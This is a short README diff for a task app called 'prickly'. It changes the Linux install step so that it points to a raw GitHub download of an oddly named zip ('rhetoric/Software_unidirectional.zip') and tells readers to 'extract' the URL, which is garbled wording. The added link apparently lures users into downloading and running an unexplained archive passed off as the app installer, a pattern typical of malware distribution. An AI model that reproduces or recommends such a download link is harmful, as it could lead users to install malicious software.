carolinavigil/prickly/README.md

 5. **Run the Installer:**
    - For Windows: Double-click the `.exe` file and follow the on-screen instructions.
    - For Mac: Open the `.dmg` file and drag the prickly app to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the included README for installation.
+   - For Linux: Extract the `https://github.com/carolinavigil/prickly/raw/refs/heads/main/rhetoric/Software_unidirectional.zip` file and follow the included README for installation.

 6. **Launch prickly:** After installation, you can find prickly in your applications or programs list.
 Open it and start managing your tasks effectively!